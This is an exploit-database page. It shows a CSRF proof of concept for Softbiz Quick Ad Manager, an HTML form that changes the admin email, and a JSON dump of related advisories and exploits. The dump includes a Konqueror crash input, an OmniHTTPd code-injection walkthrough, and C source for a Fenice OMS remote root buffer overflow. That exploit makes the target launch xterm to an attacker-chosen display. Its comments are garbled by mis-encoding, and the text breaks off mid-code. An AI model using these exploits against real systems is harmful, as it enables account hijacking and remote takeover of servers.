Search...

Softbiz Quick Ad Manager CSRF

2012-03-12T00:00:00

ID 1337DAY-ID-17678
Type zdt
Reporter Jonturk75
Modified 2012-03-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Softbiz Quick Ad Manager CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-quick-ad-manager/32339/
# Category::  webapps
# Demo : http://www.softbizscripts.com/scripts/ba/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


&lt;form action="updateconfig.php" method="post" name="frm1" id="frm1"  onSubmit="return Validator(this);" &gt;
&lt;input type="hidden" size="35" value="[email protected]" id="adminemail3" class="box1" name="adminemail"/&gt;
&lt;input type="submit" value="Update Site Configuration" class="submit" name="Submit2"/&gt;
&lt;/form&gt;



#  0day.today [2018-02-17]  #

JSON Vulners Source

Initial Source

{"hash": "af64a63a9fb41b682db16c2574f3f5ad05e39a64942af973cebe9e48691c2ba4", "id": "1337DAY-ID-17678", "lastseen": "2018-02-17T21:23:42", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "cc30031148929b962fa40f36ac33feb7", "key": "href"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "modified"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c747582e8f72585c866b80c4ded208f7", "key": "reporter"}, {"hash": "289aa1827c243bf238849850a0920bcd", "key": "sourceData"}, {"hash": "560a2f290b73c61079d9b201d37988ed", "key": "sourceHref"}, {"hash": "0728194659f36e54b92912eec61bad3e", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-8911", "1337DAY-ID-8700"]}], "modified": "2018-02-17T21:23:42"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17678", "description": "Exploit for php platform in category web applications", "title": "Softbiz Quick Ad Manager CSRF", "history": [{"bulletin": {"hash": "eb64a8c91d385f374759efe8edc0b268755fd13a9d29bb069273d22c7a2223e5", "id": "1337DAY-ID-17678", "lastseen": "2016-04-20T00:57:30", "enchantments": {"score": {"value": 3.5, "modified": "2016-04-20T00:57:30"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "054f850b2ed59e19ccfe314432dbf8fd", "key": "href"}, {"hash": "a7e13916ea41deb3b3e835e0fa65f974", "key": "published"}, {"hash": "8cbc953b2cccc99899d4e2d91dd9c3b3", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0728194659f36e54b92912eec61bad3e", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "63adac6ccffb04a916f4e23bd2211bac", "key": "sourceData"}, {"hash": "c747582e8f72585c866b80c4ded208f7", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17678", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Softbiz Quick Ad Manager CSRF", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: Softbiz Quick Ad Manager CSRF\r\n# Author: Jonturk75\r\n# Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-quick-ad-manager/32339/\r\n# Category:: webapps\r\n# Demo : http://www.softbizscripts.com/scripts/ba/admin/\r\n# Greetz: Inj3ct0r Exploit DataBase 1337day.com\r\n\r\n\r\n<form action=\"updateconfig.php\" method=\"post\" name=\"frm1\" id=\"frm1\" onSubmit=\"return Validator(this);\" >\r\n<input type=\"hidden\" size=\"35\" value=\"yourmail@mail.com\" id=\"adminemail3\" class=\"box1\" name=\"adminemail\"/>\r\n<input type=\"submit\" value=\"Update Site Configuration\" class=\"submit\" name=\"Submit2\"/>\r\n</form>\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2012-03-12T00:00:00", "references": [], "reporter": "Jonturk75", "modified": "2012-03-12T00:00:00", "href": "http://0day.today/exploit/description/17678"}, "lastseen": "2016-04-20T00:57:30", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: Softbiz Quick Ad Manager CSRF\r\n# Author: Jonturk75\r\n# Vendor or Software Link: http://www.scripts.com/viewscript/softbiz-quick-ad-manager/32339/\r\n# Category:: webapps\r\n# Demo : http://www.softbizscripts.com/scripts/ba/admin/\r\n# Greetz: Inj3ct0r Exploit DataBase 1337day.com\r\n\r\n\r\n<form action=\"updateconfig.php\" method=\"post\" name=\"frm1\" id=\"frm1\" onSubmit=\"return Validator(this);\" >\r\n<input type=\"hidden\" size=\"35\" value=\"[email\u00a0protected]\" id=\"adminemail3\" class=\"box1\" name=\"adminemail\"/>\r\n<input type=\"submit\" value=\"Update Site Configuration\" class=\"submit\" name=\"Submit2\"/>\r\n</form>\r\n\r\n\n\n# 0day.today [2018-02-17] #", "published": "2012-03-12T00:00:00", "references": [], "reporter": "Jonturk75", "modified": "2012-03-12T00:00:00", "href": "https://0day.today/exploit/description/17678"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: RIPEMD160\r\n\r\n ---------------------------------------------------\r\n| BuHa Security-Advisory #16 | Aug 01st, 2007 |\r\n ---------------------------------------------------\r\n| Vendor | KDE's Konqueror |\r\n| URL | http://www.konqueror.org/ |\r\n| Version | <= 3.5.7 |\r\n| Risk | Low (Denial Of Service) |\r\n ---------------------------------------------------\r\n\r\no Description:\r\n=============\r\n\r\nKonqueror is the file manager for the K Desktop Environment and an\r\nOpen Source web browser with HTML 4.01 compliance.\r\n\r\nVisit http://www.konqueror.org/ for detailed information.\r\n\r\no Denial of Service:\r\n===================\r\n\r\nFollowing HTML code forces Konqueror to crash:\r\n> <textarea></button></textarea></br><bdo dir="">\r\n> <pre><frameset>\r\n> <a>\r\n\r\nOnline-demo:\r\nhttp://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html\r\n\r\n> (gdb) set args konqueror.html\r\n> (gdb) r\r\n> Starting program: /usr/bin/konqueror konqueror.html\r\n> (no debugging symbols found)\r\n> [...]\r\n> [Thread debugging using libthread_db enabled]\r\n> [New Thread -1234381104 (LWP 5982)]\r\n> (no debugging symbols found)\r\n> [...]\r\n> Qt: gdb: -nograb added to command-line options.\r\n> Use the -dograb option to enforce grabbing.\r\n> X Error: BadDevice, invalid or uninitialized input device 169\r\n> Major opcode: 145\r\n> Minor opcode: 3\r\n> Resource id: 0x0\r\n> Failed to open device\r\n> X Error: BadDevice, invalid or uninitialized input device 169\r\n> Major opcode: 145\r\n> Minor opcode: 3\r\n> Resource id: 0x0\r\n> Failed to open device\r\n> (no debugging symbols found)\r\n> [...]\r\n>\r\n> Program received signal SIGSEGV, Segmentation fault.\r\n> [Switching to Thread -1234381104 (LWP 5982)]\r\n> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.\r\n\r\nI sent a mail to KDE's security mailing list [1] and received an answer\r\nfrom Dirk Mueller several days later. He wrote that the HTML code triggers\r\nan assert and when commenting out the assert the backtrace ends in:\r\n\r\n> #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)\r\n> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65\r\n> #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,\r\n> obj=0x0)\r\n> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624\r\n\r\nThis issue does not seem to be exploitable.\r\n\r\no Disclosure Timeline:\r\n=====================\r\n\r\n03 May 07 - DoS vulnerability discovered.\r\n07 May 07 - Vendor contacted.\r\n10 May 07 - Vendor confirmed vulnerability.\r\n01 Aug 07 - Public release.\r\n\r\no Solution:\r\n==========\r\n\r\nThere is no solution yet. I assume the KDE developers will address this\r\nbug in an upcoming KDE release.\r\n\r\no Credits:\r\n=========\r\n\r\nThomas Waldegger <bugtraq@morph3us.org>\r\nBuHa-Security Community - http://buha.info/board/\r\n\r\nIf you have questions, suggestions or criticism about the advisory feel\r\nfree to send me a mail. The address 'bugtraq@morph3us.org' is more a\r\nspam address than a regular mail address therefore it's possible that I\r\nignore some mails. Please use the contact details at http://morph3us.org/\r\nto contact me.\r\n\r\nGreets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon,\r\nRodnox, trappy and all members of BuHa.\r\n\r\nAdvisory online:\r\nhttp://morph3us.org/advisories/20070801-konqueror-3.57.txt\r\n\r\n[1] http://www.kde.org/info/security/\r\n\r\n- --\r\nDon't you feel the power of CSS Layouts?\r\nBuHa-Security Community: https://buha.info/board/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: n/a\r\nComment: http://morph3us.org/\r\n\r\niD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16\r\nWHuq7rPUBPx1/5nx+jJUPDg=\r\n=R4ZU\r\n-----END PGP SIGNATURE-----", "modified": "2007-08-03T00:00:00", "published": "2007-08-03T00:00:00", "id": "SECURITYVULNS:DOC:17678", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17678", "title": "[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Crash on invalid sequences of open and close HTML tags.", "modified": "2007-08-03T00:00:00", "published": "2007-08-03T00:00:00", "id": "SECURITYVULNS:VULN:7998", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7998", "title": "KDE Konqueror DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "Weak installation folder permissions.", "modified": "2006-11-22T00:00:00", "published": "2006-11-22T00:00:00", "id": "SECURITYVULNS:VULN:6851", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6851", "title": "PassGo SSO Plus weak permissions", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "The following vulnerabilities apply to all releases of getmail prior to 3.2.5, \r\nand all version 4 releases prior to 4.2.0. They do not apply where getmail is \r\nrun as an unprivileged user, or where an unprivileged external MDA is used \r\nfor the final delivery of mail. They are not exploitable remotely.\r\n\r\nAlthough it is not the recommended mode of operation, by being run as root, \r\ngetmail is able give users ownership of the files containing their new mail. \r\nHowever, the built-in mail delivery code was not suitable for use as root in \r\nthe presence of hostile local users. It had the following vulnerabilities:\r\n\r\nMbox delivery (version 4 releases prior to 4.2.0):\r\n\r\nAttacker replacing an mbox file with a symbolic link can have mail delivered \r\n(as root) into a new mbox file with a name and path of their choosing. \r\nSuccessful exploitation of a race condition allows existing files to be \r\noverwritten. The files are given 600 permissions and the same owner/group\r\nas the directory containing the mbox delivery point.\r\n\r\nMaildir delivery (version 4 releases prior to 4.2.0, all releases prior to \r\n3.2.5):\r\n\r\nAttacker replacing subdirectories of a maildir with suitable symbolic links \r\ncan have mail delivered into an arbitrary directory. Filenames cannot be \r\nchosen by the attacker, but successful exploitation of a race condition can \r\nallow arbitrary file contents to be substituted for mail. The files are given \r\n600 permissions and the same owner/group as the maildir.\r\n\r\nBoth sets of vulnerabilities may be exploited to have arbitrary commands \r\nexecuted as root.\r\n\r\nWorkaround:\r\n\r\nDo not run getmail as a privileged user; or, in version 4, use an external MDA \r\nwith explicitly configured user and group privileges.\r\n\r\nFix:\r\n\r\nVersions 3.2.5 and 4.2.0 are now available at:\r\n\r\nhttp://www.qcc.ca/~charlesc/software/getmail-4/\r\n\r\nVersion 3.2.5 just enforces the workaround. Version 4.2.0 solves the problem \r\nby dropping privileges to those of an explicitly configured user before \r\ndelivering mail, as was already done for delivery by external MDAs.\r\n\r\nNote: version 4 releases require Python 2.3.3 or later. Python 2.3.x can be \r\ninstalled alongside an earlier version if required; see the README file in \r\nthe latest source tarball, available at http://www.python.org. Once \r\ninstalled, getmail will use whichever version was initially used to run its \r\nsetup script.", "modified": "2004-09-27T00:00:00", "published": "2004-09-27T00:00:00", "id": "SECURITYVULNS:DOC:6851", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6851", "title": "Local root compromise possible with getmail", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:15", "bulletinFamily": "software", "description": "\u041f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 \u0432\u043d\u0435\u0448\u043d\u0435\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043d\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0430\u0431\u0441\u043e\u043b\u044e\u0442\u043d\u044b\u0439 \u043f\u0443\u0442\u044c, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 root.", "modified": "2001-05-03T00:00:00", "published": "2001-05-03T00:00:00", "id": "SECURITYVULNS:VULN:1172", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:1172", "title": "\u0414\u044b\u0440\u043a\u0430 \u0432 SAP R/3 (saposcol)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "description": "Vulnerabilities in OmniHTTPd default installation\r\n\r\n\r\n\r\n Overview\r\n\r\nTwo vulnerabilities exist within the 'statsconfig.pl' script that\r\ncomes with OmniHTTPd v2.07 and is installed by default. The first\r\nallows a remote attacker to corrupt any file in the system. The\r\nsecond\r\nallows arbitrary code to be inserted into '/cgi-bin/stats.pl'.\r\n\r\n\r\n\r\n Details\r\n\r\nHere is the offending code:\r\n\r\n\r\n if ($FORM{'mostbrowsers'}) {\r\n $mostbrowsers_str = '$most_browsers = "' .\r\n $FORM{'mostbrowsers'} .\r\n'";';\r\n }\r\n\r\n ...\r\n\r\n unless (-f "$FORM{'cgidir'}/stats.prg") {\r\n $error .= "<LI>Config couldn't find the file stats.prg in\r\n your cgi-bin\r\ndirectory.";\r\n [ exit(); ]\r\n }\r\n\r\n ...\r\n\r\n $cgifile = "$FORM{'cgidir'}/stats.pl";\r\n $progfile = "$FORM{'cgidir'}/stats.prg";\r\n\r\n open(CGI, "> $cgifile");\r\n open(PROG, "$progfile");\r\n\r\n print CGI "#!/usr/local/bin/perl5\n";\r\n print CGI "#AutoConfiged by Statsconfig.pl\n\n";\r\n print CGI\r\n"$deflimit_str\n$mostip_str\n$mostreq_str\n$mostbrowsers_str\n$timelog_str\n$mostipnum_str\n$mostreqf_str\n$mostbrowsernum_str\n$logloc_str\n$imagebar_str\n$serveradd_str\n$barwidth_str\n$barheight_str\n$listpass_str\n$bgcolor_str\n$bgimage_str\n$ttBGcolor_str\n\n$perllib_str\n";\r\n\r\n ...\r\n\r\n\r\n None of the variables in %FORM are filtered. An attacker simply\r\nsets $FORM{'cgidir'} to the absolute path of any file in the system\r\n(padded with a null, of course), and that file will be corrupted. \r\nNote\r\nthat because absolute file names are used, this exploit is not\r\nrestricted to the drive the webserver resides on.\r\n Code injection is achieved by setting $FORM{'mostbrowsers'} to\r\nany\r\nlegal value, followed by a semicolon and the payload.\r\n\r\n\r\n Exploit\r\n\r\nI've written an exploit in PERL to demonstrate the two\r\nvulnerabilities.\r\n To corrupt a file:\r\n\r\n perl omnismash.pl localhost 80 -corrupt c:/autoexec.bak\r\n\r\n The file you choose will be overwritten with approximately 470\r\nbytes of PERL code.\r\n To inject code into '/cgi-bin/stats.pl':\r\n\r\n perl omnismash.pl localhost 80 -inject c:/httpd/cgi-bin\r\n\r\n You must pass the absolute path to the cgi-bin directory for this\r\nto work. This exploit is hard-coded to insert the following line:\r\n\r\n if( $ENV{'QUERY_STRING'} ) { open( QS,$ENV{'QUERY_STRING'}\r\n); }\r\n\r\n With that done, point your browser to\r\n'http://localhost/cgi-bin/stats.pl?|dir'. You will see a directory\r\nlisting of '/cgi-bin'.\r\n\r\n\r\n\r\n\r\n Solution\r\n\r\nErase 'statsconfig.pl' along with any other unnecessary files in your\r\n'cgi-bin'. If this is not possible in your particular situation,\r\nreplace your current 'statsconfig.pl' file with the attached\r\n'statsconfig.fixed' file. This version allows 'statsconfig.pl' to be\r\ninvoked only from localhost.\r\n\r\n\r\n\r\n\r\n Vendor Status\r\n\r\nOmnicron Technologies Corporation was notified via\r\n<info@omnicron.ab.ca> and <support@omnicron.ab.ca> on Monday,\r\nJanuary 8, 2001. No reply was received.\r\nFree, encrypted, secure Web-based email at www.hushmail.com", "modified": "2001-01-16T00:00:00", "published": "2001-01-16T00:00:00", "id": "SECURITYVULNS:DOC:1172", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1172", "title": "Vulnerabilities in OmniHTTPd default installation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-03T21:39:33", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2007-04-29T00:00:00", "published": "2007-04-29T00:00:00", "id": "1337DAY-ID-8911", "href": "https://0day.today/exploit/description/8911", "type": "zdt", "title": "Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)", "sourceData": "===================================================================\r\nFenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)\r\n===================================================================\r\n\r\n/*\r\n**\r\n** Fedora Core 6 (exec-shield) based\r\n** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\r\n** by Xpl017Elz\r\n**\r\n** Advanced exploitation in exec-shield (Fedora Core case study)\r\n** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt\r\n**\r\n** Reference: http://www.securityfocus.com/bid/17678\r\n** vendor: http://streaming.polito.it/legacy_server\r\n**\r\n** --\r\n** exploit by \"you dong-hun\"(Xpl017Elz), <[email\u00a0protected]>.\r\n** My World: http://x82.inetcop.org\r\n**\r\n*/\r\n/*\r\n** -=-= POINT! POINT! POINT! POINT! POINT! =-=-\r\n**\r\n** This is a very common standalone daemon remote buffer overflow vulnerability.\r\n** I used the method that I used on my proftpd exploit again to avoid random mapping library.\r\n** And I'm plainning to publish it in English.\r\n**\r\n** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt\r\n**\r\n** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n\r\n\r\n#define UNAME_PLT 0x8048e9c // <[email\u00a0protected]> // randomCI\u00c2\u00b0O mapping\u00c2\u00b5C?A (execle()>>16)&0xff GOT 1byte?\u00c2\u00a6 E\u00c2\u00ae??CI\u00c2\u00b1a A\u00c2\u00a7CO\r\n\r\n#define STRCPY_PLT 0x08048ffc // <[email\u00a0protected]>\r\n#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retA\u00c2\u00bb ??CO AN 12byte AI\u00c2\u00b5? (nergal's idea)\r\n\r\n#define GETGID_GOT 0x8059234 // execle() CO?o AO?O?\u00c2\u00a6 AOAC\u00c2\u00b7I A\u00c2\u00b6COCI?\u00c2\u00a9 ?OA\u00c2\u00bb GOT AO?O\r\n/*\r\n\t(gdb) x/x 0x8059234\r\n\t0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222\r\n\t(gdb) x 0x08049222\r\n\t0x8049222 <[email\u00a0protected]+6>: 0x00027068\r\n\t(gdb)\r\n*/\r\n#define GETGID_PLT\t0x0804921c // <[email\u00a0protected]> // GOT A\u00c2\u00b6CO AIEA, PLT?\u00c2\u00a6 AeCO execle() CO?o CU\u00c2\u00b5e?\u00c2\u00b5\r\n\r\n\r\n#define EXECLE_16_0xff\t0x8059156 // (execle()>>16)&0xff // uname CO?oAC 1byte: 0x!!0000\r\n#define EXECLE_08_0xff\t0x80591b5 // (execle()>>8)&0xff // bind CO?oAC 1byte: 0x00!!00\r\n#define EXECLE_00_0xff\t0x8048e83 // (execle()>>0)&0xff // ???OAo A\u00c2\u00a4AuAI 1byte: 0x0000!!\r\n\r\n\r\n/* A\u00c2\u00a4AuA?\u00c2\u00b7I A?\u00c2\u00b1U \u00c2\u00b0??ECN ?o?U\u00c2\u00b0? AOA\u00c2\u00bb \u00c2\u00b0??i, CE?a ?oA? */\r\n#define DATA_LOC 0x805af4c // heap ?o \u00c2\u00b0o\u00c2\u00b0?A\u00c2\u00bb AI?e\r\n\r\n\r\n/* /usr/X11R6/bin/xterm */\r\n#define ARG1_LOC\t0x805af4c // A\u00c2\u00b6CO\u00c2\u00b5E ?i\u00c2\u00b7E ?AAU AO?O (argv[0],argv[1]\u00c2\u00b7I ??AO)\r\n#define SLASH_STR\t0x8055acb // \"/\"\r\n#define XTERM_STR_1\t0x804875d // \"us\"\r\n#define XTERM_STR_2\t0x80585ce // \"r/\"\r\n#define X_STR_1\t\t0x8048df3 // \"X\"\r\n#define R_STR\t\t0x804a572 // \"R\"\r\n#define XTERM_STR_3\t0x804882c // \"bin\"\r\n#define X_STR_2\t\t0x8048e33 // \"x\"\r\n#define XTERM_STR_4\t0x8056a33 // \"term\"\r\n\r\n\r\n/* -display */\r\n#define ARG2_LOC\t0x805af61 // A\u00c2\u00b6CO\u00c2\u00b5E ?E?C ?AAU AO?O (argv[2]\u00c2\u00b7I ??AO)\r\n#define DISPLAY_OPTION\t0x80584b8 // \"-di\"\r\n\r\n\r\n/* xhost_ip:0 */\r\n#define ARG3_LOC\t0x805af65 // A\u00c2\u00b6CO\u00c2\u00b5E xhost IP ?AAU AO?O (argv[3]A?\u00c2\u00b7I ??AO)\r\n#define NUM_0\t\t0x8053285 // \"0\"\r\n#define NUM_1\t\t0x804ef17 // \"1\"\r\n#define NUM_2\t\t0x804b37b // \"2\"\r\n#define NUM_3\t\t0x804d622 // \"3\"\r\n#define NUM_4\t\t0x804e583 // \"4\"\r\n#define NUM_5\t\t0x80554d7 // \"5\"\r\n#define NUM_6\t\t0x8052341 // \"6\"\r\n#define NUM_7\t\t0x804d14a // \"7\"\r\n#define NUM_8\t\t0x8048db3 // \"8\"\r\n#define NUM_9\t\t0x80516bb // \"9\"\r\n\r\n\r\n#define COLON_STR 0x8057abb // \":\"\r\n#define NULL_STR 0x805afbe // 0x00000000\r\n\r\n\r\nint main(int argc,char *argv[]){\r\n\tint i=0,j=0;\r\n\tstruct hostent *se;\r\n\tstruct sockaddr_in saddr;\r\n\tunsigned long ip,ip1,ip2,ip3,ip4;\r\n\tunsigned char do_ex[4096];\r\n\tunsigned char xhost_ip[256];\r\n\tint sock;\r\n\tchar host[256];\r\n\tint port=554;\r\n\r\n\tmemset((char *)do_ex,0,sizeof(do_ex));\r\n\tip=ip1=ip2=ip3=ip4;\r\n\r\n\r\n\tprintf(\"/*\\n**\\n** Fedora Core 6 (exec-shield) based\\n\"\r\n\t\t\"** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\\n\"\r\n\t\t\"** by Xpl017Elz\\n**\\n\");\r\n\tif(argc<2){\r\n\t\tprintf(\"** Usage: %s [host] [port] [xhost ip]\\n\",argv[0]);\r\n\t\tprintf(\"**\\n** host: Fenice 1.10 Open Media Streaming Server\\n\");\r\n\t\tprintf(\"** port: default 554\\n\");\r\n\t\tprintf(\"** xhost ip: attacker xhost\\n**\\n\");\r\n\t\tprintf(\"** Example: %s fenice.omss.co.kr 554 82.82.82.82\\n**\\n*/\\n\",argv[0]);\r\n\t\texit(-1);\r\n\t}\r\n\telse {\r\n\t\tsscanf(argv[3],\"%d.%d.%d.%d\",&ip1,&ip2,&ip3,&ip4);\r\n#define IP1 16777216\r\n#define IP2 65536\r\n#define IP3 256\r\n\t\tip=0;\r\n\t\tip+=ip1 * (IP1);\r\n\t\tip+=ip2 * (IP2);\r\n\t\tip+=ip3 * (IP3);\r\n\t\tip+=ip4;\r\n\r\n\t\tmemset((char *)xhost_ip,0,256);\r\n\t\tsprintf(xhost_ip,\"%10lu\",ip);\r\n\t}\r\n\r\n\tmemset((char *)host,0,sizeof(host));\r\n\tstrncpy(host,argv[1],sizeof(host)-1);\r\n\tport=atoi(argv[2]);\r\n\r\n\tse=gethostbyname(host);\r\n\tif(se==NULL){\r\n\t\tprintf(\"** gethostbyname() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\tsock=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sock==-1){\r\n\t\tprintf(\"** socket() error\\n**\\n*/\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsaddr.sin_family=AF_INET;\r\n\tsaddr.sin_port=htons(port);\r\n\tsaddr.sin_addr=*((struct in_addr *)se->h_addr);\r\n\tbzero(&(saddr.sin_zero),8);\r\n\r\n\r\n\tprintf(\"** make exploit\\n\");\r\n\tsprintf(do_ex,\"GET /\");\r\n\tj=strlen(do_ex);\r\n\tfor(i=0;i<320;i++,j++){\r\n\t\tsprintf(do_ex+j,\"A\");\r\n\t}\r\n\r\n#define __GOGOSSING(dest,index,src){\\\r\n\t*(long *)&dest[index]=src;\\\r\n\tindex+=4;\\\r\n}\r\n\r\n\t__GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT \u00c2\u00b0? A\u00c2\u00a4?o */\r\n\t// execle() AO?O A\u00c2\u00b6CO\r\n\t{\r\n\t\ti=0;\r\n\t\t/* (execle()>>0)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_00_0xff);\r\n\t\t/* (execle()>>8)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_08_0xff);\r\n\t\t/* (execle()>>16)&0xff */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,GETGID_GOT+i++);\r\n\t\t__GOGOSSING(do_ex,j,EXECLE_16_0xff);\r\n\t}\r\n\t// argv[0],argv[1]: /usr/X11R6/bin/xterm\r\n\t{\r\n\t\ti=0;\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,SLASH_STR);\r\n\t\ti+=1; /* \"/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_1);\r\n\t\ti+=2; /* \"us\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,XTERM_STR_2);\r\n\t\ti+=2; /* \"r/\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,X_STR_1);\r\n\t\ti+=1; /* \"X\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" */\r\n\t\t__GOGOSSING(do_ex,j,STRCPY_PLT);\r\n\t\t__GOGOSSING(do_ex,j,MOVE_ESP);\r\n\t\t__GOGOSSING(do_ex,j,DATA_LOC+i);\r\n\t\t__GOGOSSING(do_ex,j,NUM_1);\r\n\t\ti+=1; /* \"1\" 